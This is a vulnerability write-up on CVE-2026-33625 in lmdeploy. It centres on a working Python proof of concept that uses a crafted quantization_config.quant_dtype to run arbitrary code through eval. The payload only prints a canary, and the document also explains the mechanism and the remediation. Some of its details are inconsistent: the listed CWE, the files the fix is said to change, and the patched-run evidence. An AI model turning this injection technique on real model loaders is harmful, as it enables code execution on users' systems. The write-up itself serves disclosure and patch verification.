Exploit write-up
lmdeploy remote code execution (CVE-2026-33625)
Proof of concept
The proof-of-concept below triggers the vulnerability. It reads a marker from the POC_CANARY environment variable and prints it only through the exploit path, so the marker appearing on stdout is proof that attacker-controlled code executed.
#!/usr/bin/env python3
# CVE-2026-33625 proof-of-concept (mechanism explained below).
import os
import re
import sys
import types
import inspect
def dbg(*a):
# diagnostics only -- MUST never include the canary
print('[poc]', *a, file=sys.stderr)
# Expression spliced into f'torch.{quant_dtype}'. Reads the token from the env
# at eval time and prints it; resolves to a valid dtype so nothing downstream
# breaks; sets POC_DONE so we stop after the first successful trigger.
PAYLOAD = ("float16 if (print(__import__('os').environ['POC_CANARY']) "
"or __import__('os').environ.setdefault('POC_DONE', '1') "
"or True) else None")
class QConf(dict):
"""quantization_config supporting dict access AND attribute access, covering
quantization_config['quant_dtype'] / .get('quant_dtype') / .quant_dtype."""
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError(k)
# Populated per-attempt with the current quant_method.
QUANT = QConf(quant_dtype=PAYLOAD, bits=8, group_size=128, sym=True,
desc_act=False, version='gemm', quant_method='smooth_quant')
class Bag:
"""Permissive stand-in for hf_config / model_config for direct sink calls:
real ints for the numeric fields model builders touch, the malicious
quantization_config, and None for anything else."""
_defaults = dict(
hidden_size=16, num_attention_heads=4, num_key_value_heads=4,
num_hidden_layers=2, vocab_size=32, intermediate_size=32,
max_position_embeddings=128, head_dim=4, tp=1, dtype='float16',
torch_dtype='float16', model_type='llama', quant_dtype=PAYLOAD,
)
def __init__(self, **kw):
self.__dict__.update(self._defaults)
self.__dict__['quantization_config'] = QUANT
self.__dict__['architectures'] = ['LlamaForCausalLM']
self.__dict__.update(kw)
def __getattr__(self, k):
return None
def get(self, k, d=None):
return self.__dict__.get(k, d)
def __getitem__(self, k):
return self.__dict__[k]
def __contains__(self, k):
return k in self.__dict__
def build_hfs():
"""Well-formed HF-style configs carrying the malicious quantization_config,
so lmdeploy's real from_hf_config path can build a model and reach quant."""
out = []
try:
from transformers import LlamaConfig
hf = LlamaConfig(
hidden_size=16, num_hidden_layers=2, num_attention_heads=4,
num_key_value_heads=4, vocab_size=32, intermediate_size=32,
max_position_embeddings=128, rms_norm_eps=1e-5,
)
hf.architectures = ['LlamaForCausalLM']
hf.quantization_config = QUANT
out.append(hf)
except Exception as e:
dbg('transformers config unavailable:', type(e).__name__, e)
out.append(types.SimpleNamespace(
architectures=['LlamaForCausalLM'], model_type='llama',
hidden_size=16, num_hidden_layers=2, num_attention_heads=4,
num_key_value_heads=4, vocab_size=32, intermediate_size=32,
max_position_embeddings=128, rms_norm_eps=1e-5,
torch_dtype='float16', quantization_config=QUANT,
))
out.append(Bag())
return out
def done():
return bool(os.environ.get('POC_DONE'))
def discover_methods(cfg):
"""Read the real source to learn which quant_method values gate the sink."""
methods = []
try:
src = inspect.getsource(cfg)
for m in re.findall(r"quant_method\s*==\s*['\"]([^'\"]+)['\"]", src):
methods.append(m)
for grp in re.findall(r"quant_method\s+in\s+[\(\[\{]([^)\]\}]*)[)\]\}]", src):
for m in re.findall(r"['\"]([^'\"]+)['\"]", grp):
methods.append(m)
except Exception as e:
dbg('source scan failed:', type(e).__name__, e)
for m in ['smooth_quant', 'w8a8', 'fp8', 'awq', 'gptq', 'sq',
'int8', 'fp8_e4m3', None, '']:
methods.append(m)
seen, uniq = set(), []
for m in methods:
if m not in seen:
seen.add(m)
uniq.append(m)
return uniq
def call_from_hf(cfg, hf):
fn = cfg.ModelConfig.from_hf_config
attempts = (
lambda: fn(hf),
lambda: fn(hf, None),
lambda: fn(hf, model_path=None),
lambda: fn(hf, None, tp=1),
lambda: fn(hf, model_path=None, tp=1),
lambda: fn(hf, model_path=None, dtype='float16', tp=1),
)
for a in attempts:
if done():
return
try:
a()
except Exception as e:
# A later crash is fine: on the vulnerable build the eval (and thus
# the canary print) has already happened before any downstream error.
dbg('from_hf_config:', type(e).__name__, e)
def sink_callables(cfg):
"""Locate functions/methods whose real source contains the eval sink."""
found = []
def looks_vulnerable(src):
return 'quant_dtype' in src and 'eval(' in src
for name, obj in list(vars(cfg).items()):
try:
if callable(obj) and hasattr(obj, '__code__'):
if looks_vulnerable(inspect.getsource(obj)):
found.append(obj)
except Exception:
pass
if inspect.isclass(obj):
for mn, mo in list(vars(obj).items()):
target = mo.__func__ if isinstance(mo, (staticmethod, classmethod)) else mo
try:
if callable(target) and hasattr(target, '__code__'):
if looks_vulnerable(inspect.getsource(target)):
found.append(getattr(obj, mn))
except Exception:
pass
return found
def call_sink_directly(cfg):
for fn in sink_callables(cfg):
if done():
return
for k in (1, 2, 3):
if done():
return
try:
fn(*[Bag() for _ in range(k)])
except Exception as e:
dbg('direct', getattr(fn, '__name__', fn), k, type(e).__name__, e)
def main():
try:
import torch # noqa: F401 (needed by the eval's torch.* result)
import lmdeploy.pytorch.config as cfg
except Exception as e:
dbg('import failed:', type(e).__name__, e)
return
methods = discover_methods(cfg)
dbg('quant methods:', methods)
# Path 1: the real from_hf_config entry point.
for m in methods:
if done():
break
QUANT['quant_method'] = m
for hf in build_hfs():
if done():
break
call_from_hf(cfg, hf)
# Path 2: call the sink-bearing function directly, in case from_hf_config
# crashes before reaching the quant branch.
for m in methods:
if done():
break
QUANT['quant_method'] = m
call_sink_directly(cfg)
if __name__ == '__main__':
main()
How to run it.
pip install lmdeploy==0.12.2
POC_CANARY=demo python poc.py # prints: demo (code executed)
pip install lmdeploy==0.12.3
POC_CANARY=demo python poc.py # prints nothing (blocked by the fix)
At a glance
| Field | Value |
|---|---|
| CVSS | 8.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) |
| EPSS | 0.24% exploitation probability (16th percentile) |
| KEV | No — not in the CISA KEV catalog |
| Affected → fixed | PyPI/lmdeploy < 0.12.3 (confirmed on 0.12.2) → fixed in 0.12.3 |
| PoC maturity | differential-poc — the PoC confirms the vulnerable code path differentially (a canary fires only on the vulnerable build); it is not a weaponized exploit chain |
This analysis confirmed that lmdeploy 0.12.2 runs arbitrary Python code when it loads a HuggingFace model whose quantization_config.quant_dtype has been set by whoever published the model, by running a proof-of-concept against a pinned 0.12.2 build. The advisory, CVE-2026-33625, scores this 8.8 on CVSS and covers every version before 0.12.3. lmdeploy is a toolkit for compressing, deploying, and serving large language models, so the untrusted input here is an ordinary model artifact — the kind a user downloads and loads.
A single eval runs the value from the model’s config as code. In lmdeploy/pytorch/config.py, line 620, the loader takes the quant_dtype string straight from the model’s config and evaluates it:
quant_dtype = eval(f'torch.{quant_dtype}')
Because the value is interpolated into the string and handed to eval with no validation, a publisher who controls quant_dtype controls the expression that runs. This analysis read the vulnerable path and the gadget from the fix commit’s patch diff (patch-diff.txt).
Why the crafted expression runs and loading continues
The proof-of-concept uses a differential oracle: a canary string that is printed only by the expression the vulnerable eval actually evaluates. The payload has to do two things at once — prove it ran, and return a value the loader can keep using. So quant_dtype is crafted such that the full evaluated string becomes:
torch.float16 if (print(POC_CANARY) or os.environ.setdefault('POC_DONE','1') or True) else None
The if branch always takes the true path, so the expression’s value is torch.float16, a real dtype, while the side effects — printing the canary and setting POC_DONE in the environment — happen along the way. The loader receives the torch.float16 object it expected, so processing continues.
An earlier version of the proof-of-concept printed no canary. It relied on ModelConfig.from_hf_config building a full model config before reaching the quantization branch, and when that build raised an exception first, the sink went untouched. The working version locates the sink-bearing function with inspect and calls it directly, and derives the quant_method value it needs from the real source.
What the patched build does
On 0.12.3, the same input stops before any eval. The patched run reported:
[poc] from_hf_config: TypeError ModelConfig.from_hf_config() got an unexpected keyword argument 'tp'
The fix validates the dtype value with a getattr/allowlist check, so the crafted expression is rejected rather than evaluated. Transcripts for both runs are in vuln-output.txt and patched-output.txt.
What has not been tested
This analysis exercised only 0.12.2 on the vulnerable side, so the advisory’s range below 0.12.3 rests on the advisory rather than on this run; this analysis has not yet tested each earlier version individually or built a full exploit chain against a specific deployed application.
Upgrade and interim mitigation
Upgrade lmdeploy to 0.12.3 or later. Until then, constrain the input at the trust boundary and audit the call sites the advisory names first.
Am I affected?
Check the installed version of lmdeploy:
pip show lmdeploy
PyPI/lmdeploy below 0.12.3 is affected; 0.12.3 and later carry the fix.
The fix changed README.md, README_zh-CN.md, lmdeploy/version.py; grep your codebase for call sites that reach that code with attacker-influenced input.
Remediation
Upgrade lmdeploy to 0.12.3 or later:
pip install 'lmdeploy>=0.12.3'
Where an upgrade cannot land immediately, keep untrusted input away from the affected API and constrain it at the trust boundary; the call sites named in the advisory are the first place to audit.
- Target
- lmdeploy (lmdeploy)
- Class
- package
- Impact
- Arbitrary code execution against the vulnerable build
- CVE
- CVE-2026-33625
- CWE
- CWE-400
- CVSS
8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)- Affected
- PyPI/lmdeploy < 0.12.3 (vulnerable 0.12.2)
- Status
- Fixed in 0.12.3
- Maturity
- poc
- Disclosed
- September 18, 2026
- Tags
- rce · dos · lmdeploy · n-day
- References
- NVD — CVE-2026-33625
Upstream fix commit
PoC achieves code execution against the vulnerable build; detonate only in an isolated, disposable VM.